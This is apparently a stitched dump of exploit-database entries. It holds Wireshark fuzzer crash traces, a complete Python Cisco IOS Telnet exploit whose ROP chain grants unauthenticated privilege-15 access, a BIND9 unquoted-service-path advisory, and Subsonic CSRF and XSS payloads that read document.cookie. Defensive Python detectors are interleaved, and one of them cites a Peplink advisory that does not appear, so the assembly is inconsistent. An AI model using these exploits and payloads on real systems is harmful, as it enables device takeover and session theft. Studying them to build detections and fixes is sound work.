#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
#48 0x564f18277e7b in main tshark.c:1954:13
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#50 0x564f18165709 in _start (run/tshark+0xd1709)
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42124.zip
Build Information:
TShark (Wireshark) 2.3.0 (v2.3.0rc0-3369-g2e2ba64b72)
Copyright 1998-2017 Gerald Combs <gerald@wireshark.org> and contributors.
License GPLv2+: GNU GPL version 2 or later <http://www.gnu.org/licenses/old-licenses/gpl-2.0.html>
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Compiled (64-bit) with libpcap, with POSIX capabilities (Linux), with libnl 3,
with GLib 2.50.3, with zlib 1.2.11, without SMI, with c-ares 1.12.0, with Lua
5.2.4, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with MIT Kerberos, with GeoIP,
with nghttp2 1.20.0, with LZ4, with Snappy, with libxml2 2.9.4.
Running on Linux 4.10.13-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
--
A problem was found by the oss-fuzz project:
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1303
Attached is the sample that triggers this error which can be reproduced with an
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
--
wsutil/inet_ipv6.h:111:15: runtime error: member access within null pointer of type 'const struct e_in6_addr'
#0 0x7f2b8106b2b8 in in6_is_addr_multicast wsutil/inet_ipv6.h:111:15
#1 0x7f2b81068247 in dissect_routing6_rpl epan/dissectors/packet-ipv6.c:952:9
#2 0x7f2b81052227 in dissect_routing6 epan/dissectors/packet-ipv6.c:1217:9
#3 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#4 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#5 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#6 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#7 0x7f2b800c8361 in dissect_ayiya epan/dissectors/packet-ayiya.c:134:9
#8 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#9 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#10 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#11 0x7f2b83a917c9 in dissector_try_uint epan/packet.c:1353:9
#12 0x7f2b822f9326 in decode_udp_ports epan/dissectors/packet-udp.c:678:7
#13 0x7f2b8230ee02 in dissect epan/dissectors/packet-udp.c:1131:5
#14 0x7f2b822fe12f in dissect_udp epan/dissectors/packet-udp.c:1137:3
#15 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#16 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#17 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#18 0x7f2b80a62252 in dissect_exported_pdu epan/dissectors/packet-exported_pdu.c:307:17
#19 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#20 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#21 0x7f2b83a9028d in dissector_try_uint_new epan/packet.c:1329:8
#22 0x7f2b80b803e7 in dissect_frame epan/dissectors/packet-frame.c:521:11
#23 0x7f2b83aa6a6d in call_dissector_through_handle epan/packet.c:684:8
#24 0x7f2b83a9126f in call_dissector_work epan/packet.c:759:9
#25 0x7f2b83a9fe87 in call_dissector_only epan/packet.c:2992:8
#26 0x7f2b83a88034 in call_dissector_with_data epan/packet.c:3005:8
#27 0x7f2b83a87054 in dissect_record epan/packet.c:567:3
#28 0x7f2b83a1f398 in epan_dissect_run_with_taps epan/epan.c:474:2
#29 0x561364f21686 in process_packet_single_pass tshark.c:3419:5
#30 0x561364f1a821 in process_cap_file tshark.c:3250:11
#31 0x561364f12549 in main tshark.c:1955:17
#32 0x7f2b754f9510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
#33 0x561364dff4f9 in _start (run/tshark+0xd44f9)
SUMMARY: AddressSanitizer: undefined-behavior wsutil/inet_ipv6.h:111:15 in
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42123.zip
#!/usr/bin/python
# Author:
# Artem Kondratenko (@artkond)
import socket
import sys
from time import sleep
set_credless = True
if len(sys.argv) < 3:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
elif sys.argv[2] == '--unset':
set_credless = False
elif sys.argv[2] == '--set':
pass
else:
print sys.argv[0] + ' [host] --set/--unset'
sys.exit()
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))
print '[+] Connection OK'
print '[+] Received bytes from telnet service:', repr(s.recv(1024))
#sleep(0.5)
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x2c\x8b\x74' # +8 address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
payload += '\x00\x00\x99\x80' # +12 set address of func that rets 1
else:
payload += '\x00\x04\xea\x58' # unset
payload += 'BBBB' # +16(+0) r1 points here at second gadget
payload += '\x00\xdf\xfb\xe8' # +4 second gadget address 0x00dffbe8: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC' # +8
payload += 'DDDD' # +12
payload += 'EEEE' # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x78\x8c' # +20(+4) third gadget address. 0x0006788c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x2c\x8b\x60' # +8 r1+8 = 0x022c8b60
payload += 'FFFF' # +12
payload += 'GGGG' # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6b\xa1\x28' # +20(+4) fourth gadget address 0x006ba128: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
payload += '\x00\x12\x52\x1c' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x0012521c: li r3, 0xf; blr;
else:
payload += '\x00\x04\xe6\xf0' # unset
payload += 'HHHH' # +12
payload += 'IIII' # +16(+0) r1 points here at fifth gadget
payload += '\x01\x48\xe5\x60' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ' # +8 r1 points here at third gadget
payload += 'KKKK' # +12
payload += 'LLLL' # +16
payload += '\x01\x13\x31\xa8' # +20 original execution flow return addr
payload += ':15:' + '\xff\xf0'
s.send(payload)
print '[+] All done'
s.close()
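The script above delivers its payload inside a Telnet ENVIRON subnegotiation (IAC SB 0x24 ... IAC SE, option 36 from RFC 1408): a USERVAR named CISCO_KITS followed by a VALUE that is far longer than any hostname-style string, which is what overruns the stack. As an added detection example (not part of the exploit and not Cisco code), the following Python parser walks a captured Telnet byte stream, decodes the ENVIRON variable list including ESC-escaped bytes, and flags a CISCO_KITS value that is oversized or contains non-printable bytes. The length threshold, the benign sample value and the oversized sample (padding plus NUL-containing bytes, no real addresses) are constructed.

```python
from typing import Iterator, List, Tuple

IAC, SB, SE = 0xFF, 0xFA, 0xF0
OPT_ENVIRON = 0x24                   # Telnet option 36 (RFC 1408), as in the script above
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3
MAX_KITS_VALUE = 64                  # assumed sane length for a CISCO_KITS value

def iter_subnegotiations(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (option, body) for each IAC SB <option> ... IAC SE in a Telnet stream."""
    pos = 0
    while True:
        start = data.find(bytes([IAC, SB]), pos)
        if start < 0 or start + 2 >= len(data):
            return
        end = data.find(bytes([IAC, SE]), start + 3)
        if end < 0:
            return
        yield data[start + 2], data[start + 3:end]
        pos = end + 2

def parse_environ_vars(rest: bytes) -> List[Tuple[int, bytes, bytes]]:
    """Split the bytes after IS/SEND into (kind, name, value) triples.
    VAR/USERVAR start a new entry, VALUE switches to its value, ESC keeps the
    next byte literally even if it is one of the control codes."""
    triples: List[Tuple[int, bytes, bytes]] = []
    kind = None
    name, value = bytearray(), bytearray()
    target = None
    i = 0
    while i < len(rest):
        b = rest[i]
        if b == ESC and i + 1 < len(rest):
            if target is not None:
                target.append(rest[i + 1])
            i += 2
            continue
        if b in (VAR, USERVAR):
            if kind is not None:
                triples.append((kind, bytes(name), bytes(value)))
            kind, name, value = b, bytearray(), bytearray()
            target = name
        elif b == VALUE:
            target = value
        elif target is not None:
            target.append(b)
        i += 1
    if kind is not None:
        triples.append((kind, bytes(name), bytes(value)))
    return triples

def inspect_environ(body: bytes) -> List[str]:
    """Findings for one ENVIRON subnegotiation body (first byte is IS=0 or SEND=1)."""
    findings: List[str] = []
    if body[:1] not in (b"\x00", b"\x01"):
        findings.append("unknown_environ_command")
    for _kind, var_name, var_value in parse_environ_vars(body[1:]):
        if var_name == b"CISCO_KITS":
            if len(var_value) > MAX_KITS_VALUE:
                findings.append("cisco_kits_oversized_value")
            if any(c < 0x20 or c > 0x7E for c in var_value):
                findings.append("cisco_kits_nonprintable_value")
    return findings

def scan_telnet_stream(data: bytes) -> List[str]:
    """Run the ENVIRON checks over every subnegotiation in the stream."""
    findings: List[str] = []
    for option, body in iter_subnegotiations(data):
        if option == OPT_ENVIRON:
            findings.extend(inspect_environ(body))
    return findings

# Constructed samples: a short CISCO_KITS value, and one shaped like the
# script's payload (2: prefix, 116 bytes of padding, pointer-sized filler, :15: suffix).
BENIGN = b"\xff\xfa\x24\x00\x03CISCO_KITS\x012:sw1:15:\xff\xf0"
OVERSIZED = (b"\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + b"A" * 116
             + b"\x00\x00\x00\x10" + b":15:\xff\xf0")

if __name__ == "__main__":
    print("benign:", scan_telnet_stream(BENIGN))
    print("oversized:", scan_telnet_stream(OVERSIZED))
```

A network sensor that already reassembles the Telnet stream can apply inspect_environ per subnegotiation; on the device side the equivalent mitigation is the vendor fix plus not exposing Telnet management at all.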
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec
Vendor:
===========
www.isc.org
Product:
===========
BIND9
v9.10.5 x86 / x64
BIND is open source software that enables you to publish your Domain Name System (DNS) information on the Internet, and to resolve DNS
queries for your users. The name BIND stands for “Berkeley Internet Name Domain”, because the software originated in the early 1980s
at the University of California at Berkeley.
Vulnerability Type:
===================
Privilege Escalation
CVE Reference:
==============
CVE-2017-3141
Security Issue:
================
BIND installs as a service with an unquoted service path. To exploit this, a local attacker must place
a malicious executable file named "Program.exe" in the path of the service; if the service runs under
an account other than the attacker's, it can be used to execute code under a different set of privileges.
C:\>sc qc named
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: named
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ISC BIND
DEPENDENCIES :
SERVICE_START_NAME : .\named
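As an added defensive example (not part of the advisory and not ISC code), the following Python script parses the "sc qc" output above, derives the ambiguous executable paths Windows may try before the intended binary when a path with spaces is unquoted, and emits the sc.exe command that quotes the path. The candidate list tells an administrator which parent directories' write ACLs to review (here C:\ and C:\Program Files\), and the quoting command removes the ambiguity. The service name and path come from the advisory; the svchost example in the tests is constructed.

```python
import re
from typing import Dict, List

# Output of "sc qc named" as printed in the advisory.
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: named
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ISC BIND 9\bin\named.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ISC BIND
DEPENDENCIES :
SERVICE_START_NAME : .\named
"""

FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s?(.*)$")

def parse_sc_qc(text: str) -> Dict[str, str]:
    """Turn the NAME : value lines of sc qc output into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        match = FIELD_RE.match(line)
        if match:
            fields[match.group(1)] = match.group(2).strip()
    return fields

def image_path(binary_path_name: str) -> str:
    """Drop service arguments: keep everything up to the first '.exe'."""
    match = re.match(r"(.*?\.exe)", binary_path_name, re.I)
    return match.group(1) if match else binary_path_name

def unquoted_path_candidates(binary_path_name: str) -> List[str]:
    """Paths the service control manager may try before the real image when
    the path is unquoted and contains spaces; empty list means no issue."""
    path = binary_path_name.strip()
    if path.startswith('"'):
        return []                       # quoted paths are unambiguous
    exe = image_path(path)
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def quoting_fix(service_name: str, binary_path_name: str) -> str:
    """sc.exe command that rewrites the image path with surrounding quotes.
    The space after 'binPath=' is required by sc.exe; the inner quotes are
    escaped for cmd.exe."""
    return f'sc config {service_name} binPath= "\\"{binary_path_name}\\""'

if __name__ == "__main__":
    cfg = parse_sc_qc(SC_QC_OUTPUT)
    print("candidates:", unquoted_path_candidates(cfg["BINARY_PATH_NAME"]))
    print("fix:", quoting_fix(cfg["SERVICE_NAME"], cfg["BINARY_PATH_NAME"]))
```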
Network Access:
===============
Local
Severity:
=========
Medium
Disclosure Timeline:
==================================
Vendor Notification: May 13, 2017
Vendor confirm: May 14, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt
[+] ISR: ApparitionSec
Vendor:
================
www.subsonic.org
Product:
===============
subsonic v6.1.1
Subsonic is a media streaming server. You install it on your own computer where you keep your music or video collection.
Vulnerability Type:
======================
CSRF - Persistent XSS
CVE Reference:
==============
CVE-2017-9414
Security Issue:
================
Remote attackers can abuse the Subscribe to Podcast feature of subsonic to store persistent XSS payloads
if an authenticated user clicks a malicious link or visits an attacker controlled webpage.
Exploit/POC:
=============
<form action="http://localhost:4040/playerSettings.view" method="post">
<input name="playerId" type="hidden" value="1">
<input name="name" type="text" value="<script>alert('XSS ' +document.cookie)</script>">
<script>document.forms[0].submit()</script>
</form>
Then visit http://localhost:4040/index.view
HTTP Response:
XSS JSESSIONID=1n631ex230ljs; player-61646d696e=1; DWRSESSIONID=!hqFsK!BCyup7gBQU8spRLvw0tBacefl9Nl
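The auto-submitting form above succeeds because the server accepts any POST that carries the victim's session cookie. As an added defensive example covering both this issue and the missing CSRF protection in the Peplink advisory earlier on this page (not part of either advisory and not Subsonic or Peplink code), the following Python gate checks two things before a state-changing request is honoured: that the Origin header (or, failing that, the Referer) names the application's own origin, and that the form carries a synchronizer token derived from the session, which a page on another origin cannot read. The server secret, session id and attacker origin are constructed; the form fields are those of the PoC.

```python
import hashlib
import hmac
from typing import Dict
from urllib.parse import urlsplit

APP_ORIGIN = "http://localhost:4040"              # the instance in the PoC above
SERVER_SECRET = b"constructed-secret-change-me"   # assumption: per-deployment secret

def csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session. The server embeds it in its own
    forms; a cross-origin page cannot read it, so it cannot forge the request."""
    return hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256).hexdigest()

def origin_matches(headers: Dict[str, str]) -> bool:
    """Browsers send Origin on cross-site POSTs; fall back to Referer, and fail
    closed when neither is present."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == APP_ORIGIN

def accept_state_change(method: str, headers: Dict[str, str],
                        form: Dict[str, str], session_id: str) -> bool:
    """Gate for endpoints such as playerSettings.view that modify state."""
    if method.upper() != "POST":
        return False                      # state changes only via POST
    if not origin_matches(headers):
        return False
    supplied = form.get("csrf_token", "")
    return hmac.compare_digest(supplied, csrf_token(session_id))

# Constructed requests: the auto-submitting form from the PoC as the browser
# would send it from the attacker's page, and a legitimate same-origin one.
ATTACK_FORM = {"playerId": "1", "name": "<script>alert('XSS ' +document.cookie)</script>"}
ATTACK_HEADERS = {"Origin": "http://attacker.invalid", "Cookie": "JSESSIONID=constructed"}

if __name__ == "__main__":
    sid = "constructed-session"
    print("forged request accepted:", accept_state_change("POST", ATTACK_HEADERS, ATTACK_FORM, sid))
    legit = dict(ATTACK_FORM, csrf_token=csrf_token(sid))
    print("same-origin request accepted:", accept_state_change("POST", {"Origin": APP_ORIGIN}, legit, sid))
```

Either check alone would have stopped the PoC; keeping both guards against clients that strip Referer and against a token leaking through some other bug. The stored player name still needs output encoding when it is displayed, which is the separate XSS half of this issue.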
Misc Reflected:
XSS 1
http://localhost:4040/avatar.view?id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 2
http://localhost:4040//userChart.view?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS 3
http://localhost:4040/coverArt.view?size=%3Cscript%3Ealert(123)%3C/script%3E
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
==================================
Vendor Notification: May 29, 2017
Vendor Acknowledgement: May 30, 2017
June 4, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx